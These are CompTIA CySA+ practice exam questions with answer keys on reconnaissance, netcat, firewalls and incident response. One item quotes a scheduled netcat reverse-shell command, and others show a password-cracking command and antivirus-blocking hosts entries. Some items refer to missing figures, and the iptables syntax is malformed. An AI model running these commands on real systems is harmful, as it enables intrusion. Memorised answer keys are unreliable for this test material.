CompTIA CySA+ Set 14

The company that Lauren works for is making significant investments in infrastructure-as-a-service hosting to replace its traditional data center. Members of her organization's management have expressed concerns about data remanence when Lauren's team moves from one virtual host to another in their cloud service provider's environment. What should she instruct her team to do to avoid this concern?


Options are :

  • Zero-wipe drives before moving systems.
  • Use full-disk encryption.
  • Use data masking.
  • Span multiple virtual disks to fragment data.

Answer :Use full-disk encryption.

Lucca wants to prevent workstations on his network from attacking each other. If Lucca's corporate network looks like the network shown here, what technology should he select to prevent laptop A from being able to attack workstation B?


Options are :

  • An IPS
  • An IDS
  • A HIPS
  • A HIDS

Answer :A HIPS

Geoff wants to stop all traffic from reaching or leaving a Linux system with an iptables firewall. Which of the following commands is not one of the three iptables commands needed to perform this action?


Options are :

  • #iptables-policy INPUT DROP
  • #iptables-policy SERVICE DROP
  • #iptables-policy OUTPUT DROP
  • #iptables-policy FORWARD DROP

Answer :#iptables-policy SERVICE DROP


The company that Dan works for has recently migrated to a SaaS provider for its enterprise resource planning (ERP) software. In its traditional on-site ERP environment, Dan conducted regular port scans to help with security validation for the systems. What will Dan most likely have to do in this new environment?


Options are :

  • Use a different scanning tool.
  • Rely on vendor testing and audits.
  • Engage a third-party tester.
  • Use a VPN to scan inside the vendor's security perimeter.

Answer :Rely on vendor testing and audits.

Charles uses Network Miner to review packet captures from his reconnaissance of a target organization. One system displayed the information shown here. What information has Network Miner used to determine that the PC is a Hewlett-Packard device?


Options are :

  • The MAC address
  • The OS flags
  • The system's banner
  • The IP address

Answer :The MAC address

Laura's organization has been receiving a large amount of spam email sent specifically to the email addresses listed in her organization's domain registrations. Which of the following techniques will help her organization limit this type of spam?


Options are :

  • DNS query rate limiting
  • CAPTCHAs
  • Using a proxy service
  • Blacklisting

Answer :Using a proxy service


Eric believes that his organization has a number of vulnerable systems that have been scanned by third parties. If he wants to check publicly available vulnerability information, which of the following methods are best suited to performing this type of passive reconnaissance?


Options are :

  • Use the worldwide nmap database.
  • Search for his domain in Shodan.
  • Use the OpenVAS central vulnerability data repository.
  • Check against the CVE database for his domain.

Answer :Search for his domain in Shodan.

Adam knows that netcat is a useful penetration testing tool. Which of the following is not a way that he can use netcat, if he is using it as his only tool?


Options are :

  • File transfer
  • Port scanner
  • Encrypted shell
  • Reverse shell

Answer :Encrypted shell

Which of the following tools can be used to passively gather the information required to generate a network topology map?


Options are :

  • Wireshark
  • nmap
  • SolarWinds Network Mapper
  • Nessus

Answer :Wireshark


Lauren wants to use an advanced Google query to search for information that is not readily available as part of her reconnaissance efforts. What term is commonly used to describe these searches?


Options are :

  • Google whacks
  • SuperGoogles
  • Google dorks
  • Google gizmos

Answer :Google dorks

What type of control review will focus on change management as a major element in its assessment scope?


Options are :

  • Operational control review
  • Technical control review
  • Detective control review
  • Responsive control review

Answer :Operational control review

As part of her reconnaissance process for her organization's internal security review, Olivia uses Shodan to search for hosts within her target's IP range. She discovers the following Shodan entry listing for one of her target's devices. What should she do with this information?


Options are :

  • Activate the incident response process.
  • Contact the device administrator.
  • Log in to validate the finding.
  • Nothing, because this is a false positive.

Answer :Contact the device administrator.


Kathleen wants to verify on a regular basis that a file has not changed on the system that she is responsible for. Which of the following methods is best suited to this?


Options are :

  • Use sha1sum to generate a hash for the file and write a script to check it periodically.
  • Install and use Tripwire.
  • Periodically check the MAC information for the file using a script.
  • Encrypt the file and keep the key secret so the file cannot be modified.

Answer :Install and use Tripwire.

Selah has been tasked with gathering information to increase her penetration testing team's understanding of their customer's Internet footprint. She wants to gather details of emails, subdomains, employee names, and other information in an automated way. Which of the following tools is best suited to her needs?


Options are :

  • nmap
  • theHarvester
  • Shodan
  • osint-ng

Answer :theHarvester

While reviewing the Wireshark packet capture shown here, Ryan notes an extended session using the ESP protocol. When he clicks the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with IP address 10.0.0.1 if he investigates it in person?


Options are :

  • An encrypted RAT
  • A VPN application
  • A secure web browser
  • A base64-encoded packet transfer utility

Answer :A VPN application


Ben wants to quickly check a suspect binary file for signs of its purpose or other information that it may contain. What Linux tool can quickly show him potentially useful information contained in the file?


Options are :

  • grep
  • more
  • less
  • strings

Answer :strings

While investigating a malware infection, Lauren discovers that the hosts file for the system she is reviewing contains multiple entries, as shown here:

0.0.0.0 symantec.com
0.0.0.0 mcafee.com
0.0.0.0 microsoft.com
0.0.0.0 kapersky.com

Why would the malware make this change?


Options are :

  • To redirect 0.0.0.0 to known sites
  • To prevent antivirus updates
  • To prevent other attackers from compromising the system
  • To enable remote access to the system

Answer :To prevent antivirus updates

Alice believes that one of her users may be taking malicious action on the systems she has access to. When she walks past her user's desktop, she sees the following command on the screen:

[email protected]:/home/user12# ./john -wordfile:/home/user12/mylist.txt -format:lm hash.txt

What is the user attempting to do?


Options are :

  • They are attempting to hash a file.
  • They are attempting to crack hashed passwords.
  • They are attempting to crack encrypted passwords.
  • They are attempting a pass-the-hash attack.

Answer :They are attempting to crack hashed passwords.


Nmap provides a standardized way to name hardware and software that it detects. What is this called?


Options are :

  • CVE
  • HardwareEnum
  • CPE
  • GearScript

Answer :CPE

Charles wants to detect port scans using syslog so that he can collect and report on the information using his SIEM. If he is using a default CentOS system, what should he do?


Options are :

  • Search for use of privileged ports in sequential order.
  • Search for connections to ports in the /var/syslog directory.
  • Log all kernel messages to detect scans.
  • Install additional tools that can detect scans and send the logs to syslog.

Answer :Install additional tools that can detect scans and send the logs to syslog.

Alex wants to list all of the NetBIOS sessions open on a workstation. What command should he issue to do this?


Options are :

  • nbtstat -o
  • nbtstat -r
  • nbtstat -s
  • nbtstat -c

Answer :nbtstat -s


Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on.

root 507 0.0 0.1 258268 3288 ? Ssl 15:52 0:00 /usr/sbin/rsyslogd -n
message+ 508 0.0 0.2 44176 5160 ? Ss 15:52 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activa
root 523 0.0 0.3 281092 6312 ? Ssl 15:52 0:00 /usr/lib/accountsservice/accounts-daemon
root 524 0.0 0.7 389760 15956 ? Ssl 15:52 0:00 /usr/sbin/NetworkManager --no-daemon
root 527 0.0 0.1 28432 2992 ? Ss 15:52 0:00 /lib/systemd/systemd-logind
apache 714 0.0 0.1 27416 2748 ? Ss 15:52 0:00 /www/temp/webmin
root 617 0.0 0.1 19312 2056 ? Ss 15:52 0:00 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
root 644 0.0 0.1 245472 2444 ? Sl 15:52 0:01 /usr/sbin/VBoxService
root 653 0.0 0.0 12828 1848 tty1 Ss+ 15:52 0:00 /sbin/agetty --noclear tty1 linux
root 661 0.0 0.3 285428 8088 ? Ssl 15:52 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 663 0.0 0.3 364752 7600 ? Ssl 15:52 0:00 /usr/sbin/gdm3
root 846 0.0 0.5 285816 10884 ? Ssl 15:53 0:00 /usr/lib/upower/upowerd
root 867 0.0 0.3 235180 7272 ? Sl 15:53 0:00 gdm-session-worker [pam/gdm-launch-environment]
Debian-+ 877 0.0 0.2 46892 4816 ? Ss 15:53 0:00 /lib/systemd/systemd --user
Debian-+ 878 0.0 0.0 62672 1596 ? S 15:53 0:00 (sd-pam)


Options are :

  • 508
  • 617
  • 846
  • 714

Answer :714

Michelle has been experiencing SYN floods and deploys a mitigation technique that allows the server to respond as if SYNs were accepted but then delete the SYN entry in its queue. If the client then responds with a SYN-ACK, the server reconstructs the SYN entry and continues the connection. What technique is Michelle using?


Options are :

  • SYN cookies
  • ACK-ACK
  • TCP frogging
  • SYN replay

Answer :SYN cookies

What two phases of the NIST penetration testing cycle are often repeated during a test?


Options are :

  • Planning and discovery
  • Discovery and attack
  • Planning and attack
  • Discovery and reporting

Answer :Discovery and attack


Geoff is responsible for hardening systems on his network and discovers that a number of network appliances have exposed services including telnet, FTP, and web servers. What is his best option to secure these systems?


Options are :

  • Enable host firewalls.
  • Install patches for those services.
  • Turn off the services for each appliance.
  • Place a network firewall between the devices and the rest of the network.

Answer :Place a network firewall between the devices and the rest of the network.

Lauren is performing passive intelligence gathering and discovers a directory filled with photos taken by her target organization's staff. If she wants to review the metadata from the photos, what tool can she use to do so?


Options are :

  • Strings
  • Exiftool
  • Wireshark
  • Stegdetect

Answer :Exiftool

Lauren's network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command:

at \\workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe

What does it do?


Options are :

  • It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30.
  • It uses the AT command to dial a remote host via NetBIOS.
  • It creates an HTTPS session to 10.1.2.3 every Friday at 8:30.
  • It creates a VPN connection to 10.1.2.3 every five days at 8:30 GST.

Answer :It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30.


While reviewing the filesystem of a potentially compromised system, Angela sees the following output when running ls -la. What should her next action be after seeing this?


Options are :

  • Continue to search for other changes.
  • Run diff against the password file.
  • Immediately change her password.
  • Check the passwd binary against a known good version.

Answer :Check the passwd binary against a known good version.

While conducting reconnaissance of his own organization, Chris discovers that multiple certificates are self-signed. What issue should he report to his management?


Options are :

  • Self-signed certificates do not provide secure encryption for site visitors.
  • Self-signed certificates can be revoked only by the original creator.
  • Self-signed certificates will cause warnings or error messages.
  • None of the above

Answer :Self-signed certificates will cause warnings or error messages.

Isaac has access to a Windows system that is a member of the local Active Directory domain as part of his white-box penetration test. Which of the following commands might provide information about other systems on the network?


Options are :

  • net use
  • net user
  • net group
  • net config

Answer :net use
